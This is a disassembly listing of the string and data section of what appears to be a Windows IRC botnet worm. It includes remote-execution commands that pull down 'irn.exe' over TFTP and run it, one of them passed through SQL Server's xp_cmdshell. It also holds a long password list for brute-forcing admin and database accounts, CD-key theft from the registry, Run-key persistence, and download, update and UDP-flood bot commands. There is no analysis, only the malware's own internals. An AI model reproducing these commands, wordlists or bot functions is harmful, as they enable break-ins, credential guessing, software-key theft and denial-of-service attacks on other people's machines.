dbl_41FE88	dq 4.195835e6		; DATA XREF: sub_411954+Fr
dbl_41FE90	dq 3.145727e6		; DATA XREF: sub_411954+6r
aIsprocessorfea	db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_411990+Fo
		align 4
aKernel32	db 'KERNEL32',0         ; DATA XREF: sub_411990o
		align 10h
aConout		db 'CONOUT$',0          ; DATA XREF: sub_4119EB+Eo
a1Qnan		db '1#QNAN',0           ; DATA XREF: sub_413071:loc_4131A0o
		align 10h
a1Inf		db '1#INF',0            ; DATA XREF: sub_413071+103o
		align 4
a1Ind		db '1#IND',0            ; DATA XREF: sub_413071+F4o
		align 10h
a1Snan		db '1#SNAN',0           ; DATA XREF: sub_413071+DCo
		align 4
aBadAllocation	db 'bad allocation',0   ; DATA XREF: .data:00425520o
		align 4
aScan_start	db 'scan.start',0       ; DATA XREF: .text:0041D190o
		align 4
aScan_stop	db 'scan.stop',0        ; DATA XREF: .text:0041D1ACo
byte_41FF0E	db 0			; DATA XREF: sub_41B423+9Co
byte_41FF0F	db 0			; DATA XREF: sub_41B423+A8o
dword_41FF10	dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: .text:0041D1C8o
dword_41FF1C	dd 252E6425h, 64252E64h, 64252Eh ; DATA	XREF: sub_413FED+4Ao
byte_41FF28	db 25h,	73h, 0		; DATA XREF: sub_413FED+18Co
		db 0			; DATA XREF: .data:off_426830o
byte_41FF2C	db 25h,	73h, 0		; DATA XREF: sub_413FED+28Eo
byte_41FF2F	db 0			; DATA XREF: sub_41C4FC+1DDo
dword_41FF30	dd 7325h		; DATA XREF: sub_413FED+36Ao
dword_41FF34	dd 7325h, 20646162h, 6F6C6C61h,	69746163h, 6E6Fh
					; DATA XREF: sub_413FED+479o
					; .data:00425524o
aTftpISGetIrn_e	db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
					; DATA XREF: sub_41AFFD+EFo
aBadAllocatio_0	db 'bad allocation',0   ; DATA XREF: .data:004255D8o
		align 4
aBadAllocatio_1	db 'bad allocation',0   ; DATA XREF: .data:004255DCo
		align 4
aWindowsNt42000	db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp	db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00426814o
		align 4
		dd offset loc_490059+3
		dd offset dword_430050
		dd 24h,	5C005Ch, 3 dup(0)
		dd offset loc_490059+3
		dd offset dword_430050
		dd 24h,	5C005Ch, 0
dword_41FFF8	dd 2Eh			; DATA XREF: sub_41B423+57o
dword_41FFFC	dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_41B423+76o
aSPipeBrowser	db '\\%s\pipe\browser',0 ; DATA XREF: sub_41B423+CAo
		align 4
dword_42001C	dd 4B324FC8h, 1D31670h,	475A7812h, 88E16EBFh, 0	; DATA XREF: sub_41B423+191o
dword_420030	dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
					; DATA XREF: sub_41B423+1ACo
; ---------------------------------------------------------------------------
		jmp	short near ptr dword_420050
; ---------------------------------------------------------------------------
		align 10h
dword_420050	dd 0			; CODE XREF: jlrllt49:0042004Cj
aHttpSDS_0	db 'http://%s:%d/%s',0  ; DATA XREF: sub_41B423+3C6o
aSExploitedS_	db '%s: Exploited: %s.',0 ; DATA XREF: sub_41B423+6FBo
		align 4
aBadAllocatio_2	db 'bad allocation',0   ; DATA XREF: .data:00426828o
		align 4
aSa		db 'sa',0               ; DATA XREF: sub_41BB5A+55o
		align 4
aRoot		db 'root',0             ; DATA XREF: sub_41BB5A+5Co
		align 4
aAdmin		db 'admin',0            ; DATA XREF: sub_41BB5A+63o
		align 4
aDriverSqlServe	db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
					; DATA XREF: sub_41BB5A+10Co
		align 10h
; aExecMaster(long long, *)
aExecMaster__xp	db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
					; DATA XREF: sub_41BB5A+197o
		db '&exit',0Dh,0Ah
		db 27h,0
		align 4
aSExploitedS__0	db '%s: Exploited %s.',0 ; DATA XREF: sub_41BB5A+1F1o
		align 4
aAdministrator	db 'administrator',0    ; DATA XREF: .data:00426834o
		align 4
aAdministrador	db 'administrador',0    ; DATA XREF: .data:00426838o
		align 4
aAdministrateur	db 'administrateur',0   ; DATA XREF: .data:0042683Co
		align 4
aAdministrat	db 'administrat',0      ; DATA XREF: .data:00426840o
aAdmins		db 'admins',0           ; DATA XREF: .data:00426844o
		align 10h
aAdmin_0	db 'admin',0            ; DATA XREF: .data:00426848o
		align 4
aAdm		db 'adm',0              ; DATA XREF: .data:0042684Co
aPassword1	db 'password1',0        ; DATA XREF: .data:00426850o
		align 4
aPassword	db 'password',0         ; DATA XREF: .data:00426854o
		align 4
aPasswd		db 'passwd',0           ; DATA XREF: .data:00426858o
		align 4
aPass1234	db 'pass1234',0         ; DATA XREF: .data:0042685Co
		align 4
aPass		db 'pass',0             ; DATA XREF: .data:00426860o
		align 10h
aPwd		db 'pwd',0              ; DATA XREF: .data:00426864o
a007		db '007',0              ; DATA XREF: .data:00426868o
a1:					; DATA XREF: .data:0042686Co
		unicode	0, <1>,0
a12		db '12',0               ; DATA XREF: .data:00426870o
		align 10h
a123		db '123',0              ; DATA XREF: .data:00426874o
a1234		db '1234',0             ; DATA XREF: .data:00426878o
		align 4
a12345		db '12345',0            ; DATA XREF: .data:0042687Co
		align 4
a123456		db '123456',0           ; DATA XREF: .data:00426880o
		align 4
a1234567	db '1234567',0          ; DATA XREF: .data:00426884o
a12345678	db '12345678',0         ; DATA XREF: .data:00426888o
		align 10h
a123456789	db '123456789',0        ; DATA XREF: .data:0042688Co
		align 4
a1234567890	db '1234567890',0       ; DATA XREF: .data:00426890o
		align 4
a2000		db '2000',0             ; DATA XREF: .data:00426894o
		align 10h
a2001		db '2001',0             ; DATA XREF: .data:00426898o
		align 4
a2002		db '2002',0             ; DATA XREF: .data:0042689Co
		align 10h
a2003		db '2003',0             ; DATA XREF: .data:004268A0o
		align 4
a2004		db '2004',0             ; DATA XREF: .data:004268A4o
		align 10h
aTest		db 'test',0             ; DATA XREF: .data:004268A8o
		align 4
aGuest		db 'guest',0            ; DATA XREF: .data:004268ACo
		align 10h
aNone		db 'none',0             ; DATA XREF: .data:004268B0o
		align 4
aDemo		db 'demo',0             ; DATA XREF: .data:004268B4o
		align 10h
aUnix		db 'unix',0             ; DATA XREF: .data:004268B8o
		align 4
aLinux		db 'linux',0            ; DATA XREF: .data:004268BCo
		align 10h
aChangeme	db 'changeme',0         ; DATA XREF: .data:004268C0o
		align 4
aDefault	db 'default',0          ; DATA XREF: .data:004268C4o
aSystem_0	db 'system',0           ; DATA XREF: .data:004268C8o
		align 4
aServer		db 'server',0           ; DATA XREF: .data:004268CCo
		align 4
aRoot_0		db 'root',0             ; DATA XREF: .data:004268D0o
		align 4
aNull_1		db 'null',0             ; DATA XREF: .data:004268D4o
		align 4
aQwerty		db 'qwerty',0           ; DATA XREF: .data:004268D8o
		align 4
aMail		db 'mail',0             ; DATA XREF: .data:004268DCo
		align 4
aOutlook	db 'outlook',0          ; DATA XREF: .data:004268E0o
aWeb		db 'web',0              ; DATA XREF: .data:004268E4o
aWww		db 'www',0              ; DATA XREF: .data:004268E8o
aInternet	db 'internet',0         ; DATA XREF: .data:004268ECo
		align 10h
aAccounts	db 'accounts',0         ; DATA XREF: .data:004268F0o
		align 4
aAccounting	db 'accounting',0       ; DATA XREF: .data:004268F4o
		align 4
aHome		db 'home',0             ; DATA XREF: .data:004268F8o
		align 10h
aHomeuser	db 'homeuser',0         ; DATA XREF: .data:004268FCo
		align 4
aUser		db 'user',0             ; DATA XREF: .data:00426900o
		align 4
aOem		db 'oem',0              ; DATA XREF: .data:00426904o
aOemuser	db 'oemuser',0          ; DATA XREF: .data:00426908o
aOeminstall	db 'oeminstall',0       ; DATA XREF: .data:0042690Co
		align 4
aWindows	db 'windows',0          ; DATA XREF: .data:00426910o
aWin98		db 'win98',0            ; DATA XREF: .data:00426914o
		align 4
aWin2k		db 'win2k',0            ; DATA XREF: .data:00426918o
		align 4
aWinxp		db 'winxp',0            ; DATA XREF: .data:0042691Co
		align 4
aWinnt		db 'winnt',0            ; DATA XREF: .data:00426920o
		align 4
aWin2000	db 'win2000',0          ; DATA XREF: .data:00426924o
aQaz		db 'qaz',0              ; DATA XREF: .data:00426928o
aAsd		db 'asd',0              ; DATA XREF: .data:0042692Co
aZxc		db 'zxc',0              ; DATA XREF: .data:00426930o
aQwe		db 'qwe',0              ; DATA XREF: .data:00426934o
aBob		db 'bob',0              ; DATA XREF: .data:00426938o
aJen		db 'jen',0              ; DATA XREF: .data:0042693Co
aJoe		db 'joe',0              ; DATA XREF: .data:00426940o
aFred		db 'fred',0             ; DATA XREF: .data:00426944o
		align 10h
aBill		db 'bill',0             ; DATA XREF: .data:00426948o
		align 4
aMike		db 'mike',0             ; DATA XREF: .data:0042694Co
		align 10h
aJohn		db 'john',0             ; DATA XREF: .data:00426950o
		align 4
aPeter		db 'peter',0            ; DATA XREF: .data:00426954o
		align 10h
aLuke		db 'luke',0             ; DATA XREF: .data:00426958o
		align 4
aSam		db 'sam',0              ; DATA XREF: .data:0042695Co
aSue		db 'sue',0              ; DATA XREF: .data:00426960o
aSusan		db 'susan',0            ; DATA XREF: .data:00426964o
		align 4
aPeter_0	db 'peter',0            ; DATA XREF: .data:00426968o
		align 10h
aBrian		db 'brian',0            ; DATA XREF: .data:0042696Co
		align 4
aLee		db 'lee',0              ; DATA XREF: .data:00426970o
aNeil		db 'neil',0             ; DATA XREF: .data:00426974o
		align 4
aIan		db 'ian',0              ; DATA XREF: .data:00426978o
aChris		db 'chris',0            ; DATA XREF: .data:0042697Co
		align 10h
aEric		db 'eric',0             ; DATA XREF: .data:00426980o
		align 4
aGeorge		db 'george',0           ; DATA XREF: .data:00426984o
		align 10h
aKate		db 'kate',0             ; DATA XREF: .data:00426988o
		align 4
aBob_0		db 'bob',0              ; DATA XREF: .data:0042698Co
aKatie		db 'katie',0            ; DATA XREF: .data:00426990o
		align 4
aMary		db 'mary',0             ; DATA XREF: .data:00426994o
		align 4
aLogin		db 'login',0            ; DATA XREF: .data:00426998o
		align 4
aLoginpass	db 'loginpass',0        ; DATA XREF: .data:0042699Co
		align 10h
aTechnical	db 'technical',0        ; DATA XREF: .data:004269A0o
		align 4
aBackup		db 'backup',0           ; DATA XREF: .data:004269A4o
		align 4
aExchange	db 'exchange',0         ; DATA XREF: .data:004269A8o
		align 10h
aFuck		db 'fuck',0             ; DATA XREF: .data:004269ACo
		align 4
aBitch		db 'bitch',0            ; DATA XREF: .data:004269B0o
		align 10h
aSlut		db 'slut',0             ; DATA XREF: .data:004269B4o
		align 4
aSex		db 'sex',0              ; DATA XREF: .data:004269B8o
aGod		db 'god',0              ; DATA XREF: .data:004269BCo
aHell		db 'hell',0             ; DATA XREF: .data:004269C0o
		align 4
aHello		db 'hello',0            ; DATA XREF: .data:004269C4o
		align 10h
aDomain		db 'domain',0           ; DATA XREF: .data:004269C8o
		align 4
aDomainpass	db 'domainpass',0       ; DATA XREF: .data:004269CCo
		align 4
aDomainpassword	db 'domainpassword',0   ; DATA XREF: .data:004269D0o
		align 4
aDatabase	db 'database',0         ; DATA XREF: .data:004269D4o
		align 10h
aAccess		db 'access',0           ; DATA XREF: .data:004269D8o
		align 4
aDbpass		db 'dbpass',0           ; DATA XREF: .data:004269DCo
		align 10h
aDbpassword	db 'dbpassword',0       ; DATA XREF: .data:004269E0o
		align 4
aDatabasepass	db 'databasepass',0     ; DATA XREF: .data:004269E4o
		align 4
aData		db 'data',0             ; DATA XREF: .data:004269E8o
		align 4
aDatabasepasswo	db 'databasepassword',0 ; DATA XREF: .data:004269ECo
		align 4
aDb1		db 'db1',0              ; DATA XREF: .data:004269F0o
aDb2		db 'db2',0              ; DATA XREF: .data:004269F4o
aDb1234		db 'db1234',0           ; DATA XREF: .data:004269F8o
		align 4
aSa_0		db 'sa',0               ; DATA XREF: .data:004269FCo
		align 4
aSql		db 'sql',0              ; DATA XREF: .data:00426A00o
aSqlpassoainsta	db 'sqlpassoainstall',0 ; DATA XREF: .data:00426A04o
		align 4
aOrainstall	db 'orainstall',0       ; DATA XREF: .data:00426A08o
		align 10h
aOracle		db 'oracle',0           ; DATA XREF: .data:00426A0Co
		align 4
aIbm		db 'ibm',0              ; DATA XREF: .data:00426A10o
aCisco		db 'cisco',0            ; DATA XREF: .data:00426A14o
		align 4
aDell		db 'dell',0             ; DATA XREF: .data:00426A18o
		align 4
aCompaq		db 'compaq',0           ; DATA XREF: .data:00426A1Co
		align 4
aSiemens	db 'siemens',0          ; DATA XREF: .data:00426A20o
aHp		db 'hp',0               ; DATA XREF: .data:00426A24o
		align 10h
aNokia		db 'nokia',0            ; DATA XREF: .data:00426A28o
		align 4
aXp		db 'xp',0               ; DATA XREF: .data:00426A2Co
		align 4
aControl	db 'control',0          ; DATA XREF: .data:00426A30o
aOffice		db 'office',0           ; DATA XREF: .data:00426A34o
		align 4
aBlank		db 'blank',0            ; DATA XREF: .data:00426A38o
		align 4
aWinpass	db 'winpass',0          ; DATA XREF: .data:00426A3Co
aMain		db 'main',0             ; DATA XREF: .data:00426A40o
		align 4
aLan		db 'lan',0              ; DATA XREF: .data:00426A44o
aInternet_0	db 'internet',0         ; DATA XREF: .data:00426A48o
		align 4
aIntranet	db 'intranet',0         ; DATA XREF: .data:00426A4Co
		align 10h
aStudent	db 'student',0          ; DATA XREF: .data:00426A50o
aTeacher	db 'teacher',0          ; DATA XREF: .data:00426A54o
aStaff		db 'staff',0            ; DATA XREF: .data:00426A58o
		align 4
aBadAllocatio_3	db 'bad allocation',0   ; DATA XREF: .data:0042682Co
		align 4
aUdp		db 'udp',0              ; DATA XREF: .text:0041D166o
aUdpErrorSendin	db 'UDP: Error Sending UDP Packets to %s',0 ; DATA XREF: .text:0041C364o
		align 4
aUdpSendingUdpP	db 'UDP: Sending UDP Packets to %s',0 ; DATA XREF: .text:0041C376o
		align 4
aUdpFinishedSen	db 'UDP: Finished Sending UDP Packets to %s',0 ; DATA XREF: .text:0041C4B8o
aBadAllocatio_4	db 'bad allocation',0   ; DATA XREF: .data:00426A60o
		align 4
aHardwareDescri	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
					; DATA XREF: sub_41B1F3+21o
		align 4
aMhz		db '~MHz',0             ; DATA XREF: sub_41B1F3+4Ao
		align 4
aProcessornames	db 'ProcessorNameString',0 ; DATA XREF: sub_41B1F3+6Do
aS_8		db '%s',0               ; DATA XREF: sub_41B1F3+ADo
		align 4
aSC_0		db '%s%c',0             ; DATA XREF: sub_41B1F3+112o
		align 4
aUnknown	db 'Unknown',0          ; DATA XREF: sub_41B1F3+165o
aHardwareDesc_0	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
					; DATA XREF: sub_41B1F3+1B7o
aSysinfo	db 'sysinfo',0          ; DATA XREF: .text:0041D12Eo
aNetinfo	db 'netinfo',0          ; DATA XREF: .text:0041D14Ao
aBadAllocatio_5	db 'bad allocation',0   ; DATA XREF: .data:00426A64o
		align 4
aS4		db 's4',0               ; DATA XREF: .text:0041D0F6o
		align 10h
aS4_stop	db 's4.stop',0          ; DATA XREF: .text:0041D112o
aS4SocketError	db 'S4: socket() Error',0
		align 4
aS4BindError	db 'S4: bind() Error',0 ; DATA XREF: sub_4147B2+A8o
		align 10h
aS4ListenError	db 'S4: listen() Error',0 ; DATA XREF: sub_4147B2+C1o
		align 4
aS4SI		db 'S4: %s:%i',0        ; DATA XREF: sub_4147B2+132o
		align 10h
aSc		db 'SC',0               ; DATA XREF: sub_4147B2+18Eo
		align 4
aBadAllocatio_6	db 'bad allocation',0   ; DATA XREF: .data:00426A68o
		align 4
aUptime		db 'uptime',0           ; DATA XREF: .text:0041D0A2o
		align 4
aHttp		db 'http',0             ; DATA XREF: .text:0041D0BEo
		align 4
aCdkey		db 'cdkey',0            ; DATA XREF: .text:0041D0DAo
		align 4
aB_0:					; DATA XREF: sub_414954+51o
		unicode	0, <B>,0
aC_0:					; DATA XREF: sub_414954+58o
		unicode	0, <C>,0
aD_0:					; DATA XREF: sub_414954+5Fo
		unicode	0, <D>,0
aF:					; DATA XREF: sub_414954+66o
		unicode	0, <F>,0
aG:					; DATA XREF: sub_414954+6Do
		unicode	0, <G>,0
asc_420770:				; DATA XREF: sub_414954+74o
		unicode	0, <H>,0
aJ:					; DATA XREF: sub_414954+7Bo
		unicode	0, <J>,0
aK:					; DATA XREF: sub_414954+82o
		unicode	0, <K>,0
aM:					; DATA XREF: sub_414954+89o
		unicode	0, <M>,0
aP:					; DATA XREF: sub_414954+90o
		unicode	0, <P>,0
aQ:					; DATA XREF: sub_414954+97o
		unicode	0, <Q>,0
aR:					; DATA XREF: sub_414954+9Eo
		unicode	0, <R>,0
aT:					; DATA XREF: sub_414954+A5o
		unicode	0, <T>,0
aV:					; DATA XREF: sub_414954+ACo
		unicode	0, <V>,0
aW_0:					; DATA XREF: sub_414954+B3o
		unicode	0, <W>,0
asc_420798:				; DATA XREF: sub_414954+BAo
		unicode	0, <X>,0
aY:					; DATA XREF: sub_414954+C1o
		unicode	0, <Y>,0
a2:					; DATA XREF: sub_414954+C8o
		unicode	0, <2>,0
a3:					; DATA XREF: sub_414954+CFo
		unicode	0, <3>,0
a4:					; DATA XREF: sub_414954+D6o
		unicode	0, <4>,0
a6:					; DATA XREF: sub_414954+DDo
		unicode	0, <6>,0
a7:					; DATA XREF: sub_414954+E4o
		unicode	0, <7>,0
a8:					; DATA XREF: sub_414954+EBo
		unicode	0, <8>,0
a9:					; DATA XREF: sub_414954+F2o
		unicode	0, <9>,0
aSoftwareMicros	db 'SOFTWARE\MICROSOFT\Windows NT\CurrentVersion',0
					; DATA XREF: sub_414954+47o
		align 4
aDigitalproduct	db 'DigitalProductId',0 ; DATA XREF: sub_414954+13Ao
		align 10h
asc_420800:				; DATA XREF: sub_414954+20Do
		unicode	0, <->,0
aS		db '%s',0               ; DATA XREF: sub_414954+22Bo
		align 4
aBadAllocatio_7	db 'bad allocation',0   ; DATA XREF: .data:00426A6Co
		align 4
aI_quit		db 'i.quit',0           ; DATA XREF: .text:0041D04Eo
		align 10h
aI_join		db 'i.join',0           ; DATA XREF: .text:0041D06Ao
		align 4
aI_part		db 'i.part',0           ; DATA XREF: .text:0041D086o
		align 10h
aBadAllocatio_8	db 'bad allocation',0   ; DATA XREF: .data:00426A70o
		align 10h
aDownload	db 'download',0         ; DATA XREF: .text:0041D016o
		align 4
aUpdate		db 'update',0           ; DATA XREF: .text:0041D032o
		align 4
aMozilla5_0	db 'Mozilla/5.0',0      ; DATA XREF: sub_41C4FC+33o
aDlDownloadingS	db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41C4FC+51o
		align 4
aDlFailedBadLoc	db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41C4FC:loc_41C6C6o
		align 4
aDlDownloadSIBy	db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
					; DATA XREF: sub_41C4FC+156o
		align 4
aMainUninstalli	db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41C4FC+1A7o
		align 10h
aDlFailedToUpda	db 'DL: Failed To Update',0 ; DATA XREF: sub_41C4FC:loc_41C6CDo
		align 4
aDlErrorExecuti	db 'DL: Error Executing File.',0 ; DATA XREF: sub_41C4FC+1EDo
		align 4
aDlExecutedFile	db 'DL: Executed File: %s',0 ; DATA XREF: sub_41C4FC+1FCo
		align 4
aDlFailedBadUrl	db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41C4FC:loc_41C714o
aDlFailedWinine	db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41C4FC:loc_41C71Bo
		align 4
aBadAllocatio_9	db 'bad allocation',0   ; DATA XREF: .data:00426A74o
		align 4
aBadAllocati_10	db 'bad allocation',0   ; DATA XREF: .data:00426A78o
		align 4
aTftpServer	db 'TFTP Server',0      ; DATA XREF: sub_41C12F+5Ao
aRb		db 'rb',0               ; DATA XREF: sub_41BD8A+44o
		align 4
aTftpSendComple	db 'TFTP: Send Complete To %s. %d Total Sends',0
					; DATA XREF: sub_41BD8A+1A4o
		align 4
aBadAllocati_11	db 'bad allocation',0   ; DATA XREF: .data:00426A7Co
		align 4
		dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
		dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
		dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
		dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
		dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
		dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
		dd 6CA6351h, 14292967h,	27B70A85h, 2E1B2138h, 4D2C6DFCh
		dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
		dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
		dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
		dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
		dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
		dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
		dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
		dd 1F83D9ABh, 5BE0CD19h
dword_420AF8	dd 0D728AE22h		; DATA XREF: sub_415050+318r
dword_420AFC	dd 428A2F98h		; DATA XREF: sub_415050+31Fr
dword_420B00	dd 23EF65CDh		; DATA XREF: sub_415050+548r
dword_420B04	dd 71374491h		; DATA XREF: sub_415050+54Fr
dword_420B08	dd 0EC4D3B2Fh		; DATA XREF: sub_415050+772r
dword_420B0C	dd 0B5C0FBCFh		; DATA XREF: sub_415050+779r
dword_420B10	dd 8189DBBCh		; DATA XREF: sub_415050+9B8r
dword_420B14	dd 0E9B5DBA5h		; DATA XREF: sub_415050+9BFr
dword_420B18	dd 0F348B538h		; DATA XREF: sub_415050+BFEr
dword_420B1C	dd 3956C25Bh		; DATA XREF: sub_415050+C09r
dword_420B20	dd 0B605D019h		; DATA XREF: sub_415050+E80r
dword_420B24	dd 59F111F1h		; DATA XREF: sub_415050+E87r
dword_420B28	dd 0AF194F9Bh		; DATA XREF: sub_415050+10D7r
dword_420B2C	dd 923F82A4h		; DATA XREF: sub_415050+10DEr
dword_420B30	dd 0DA6D8118h		; DATA XREF: sub_415050+1319r
dword_420B34	dd 0AB1C5ED5h		; DATA XREF: sub_415050+1320r
dword_420B38	dd 0A3030242h		; DATA XREF: sub_415050+1569r
dword_420B3C	dd 0D807AA98h		; DATA XREF: sub_415050+1570r
dword_420B40	dd 45706FBEh		; DATA XREF: sub_415050+17ABr
dword_420B44	dd 12835B01h		; DATA XREF: sub_415050+17B2r
dword_420B48	dd 4EE4B28Ch		; DATA XREF: sub_415050+19F3r
dword_420B4C	dd 243185BEh		; DATA XREF: sub_415050+19FAr
dword_420B50	dd 0D5FFB4E2h		; DATA XREF: sub_415050+1C39r
dword_420B54	dd 550C7DC3h		; DATA XREF: sub_415050+1C40r
dword_420B58	dd 0F27B896Fh		; DATA XREF: sub_415050+1E91r
dword_420B5C	dd 72BE5D74h		; DATA XREF: sub_415050+1E9Cr
dword_420B60	dd 3B1696B1h		; DATA XREF: sub_415050+210Dr
dword_420B64	dd 80DEB1FEh		; DATA XREF: sub_415050+2114r
dword_420B68	dd 25C71235h		; DATA XREF: sub_415050+236Ar
dword_420B6C	dd 9BDC06A7h		; DATA XREF: sub_415050+2371r
dword_420B70	dd 0CF692694h		; DATA XREF: sub_415050+25B8r
dword_420B74	dd 0C19BF174h		; DATA XREF: sub_415050+25BFr
		dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
		dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
		dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh,	831153B5h
		dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h,	0A831C66Dh
		dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
		dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
		dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
		dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
		dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
		dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
		dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
		dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
		dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h,	0B8D2D0C8h
		dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h,	2748774Ch
		dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
		dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h,	682E6FF3h
		dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
		dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
		dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
		dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
		dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
		dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh,	113F9804h
		dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
		dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
		dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
		dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h,	0CBBB9D5Dh
		dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
		dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h,	8EB44A87h
		dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
byte_420FF8	db 8, 0C9h		; DATA XREF: sub_415020+17o
; ---------------------------------------------------------------------------
		mov	esp, 9E667F3h
		push	3Bh
		cmpsd
		retf	8584h
; ---------------------------------------------------------------------------
		db 0AEh, 67h, 0BBh
		dd 0FE94F82Bh, 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h
		dd 510E527Fh, 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh,	1F83D9ABh
		dd 137E2179h, 5BE0CD19h, 90h dup(0)
dword_421278	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_421298	dd 255C7325h, 73h	; DATA XREF: sub_417C06+DCo
aSoftwareMicr_0	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417C06+10Co
		align 10h
aSoftwareMicr_1	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417C06+14Fo
		align 10h
aSS_3		db '%s\%s',0            ; DATA XREF: sub_417D99+BAo
		align 4
aSoftwareMicr_2	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417D99+F9o
		align 4
aSoftwareMicr_3	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417D99+14Do
		align 4
aBadAllocati_12	db 'bad allocation',0   ; DATA XREF: .data:00426C2Co
		align 4
aInstall	db '--install ',0       ; DATA XREF: sub_41C7BA:loc_41C7FAo
		align 4
aSS_6		db '%s\%s',0            ; DATA XREF: sub_41C7BA+EEo
		align 4
aSSS_0		db '%s %s%s',0          ; DATA XREF: sub_41C7BA+1BCo
aS_12		db '%s',0               ; DATA XREF: sub_41C7BA+24Eo
		align 4
aRm		db 'RM',0               ; DATA XREF: sub_41C7BA+322o
		align 4
aBk		db 'BK',0               ; DATA XREF: sub_41C7BA+35Bo
		align 10h
aUnm		db 'UNM',0              ; DATA XREF: sub_41C7BA+380o
aBadAllocati_13	db 'bad allocation',0   ; DATA XREF: .data:0042740Co
		align 4
aSS_7		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_418F1C+42o
aSS_8		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_418CAF+159o
aSS_9		db '%s-%s',0            ; DATA XREF: sub_418CAF+1D6o
		align 4
aSSSS00S	db '%s %s',0Dh,0Ah      ; DATA XREF: sub_418CAF+24Do
		db '%s %s 0 0 :%s',0Dh,0Ah,0
		align 4
asc_4213E4	db 0Dh,0Ah,0		; DATA XREF: sub_418B81+7Eo
		align 4
aS_11		db '%s',0               ; DATA XREF: sub_418B81+B6o
		align 4
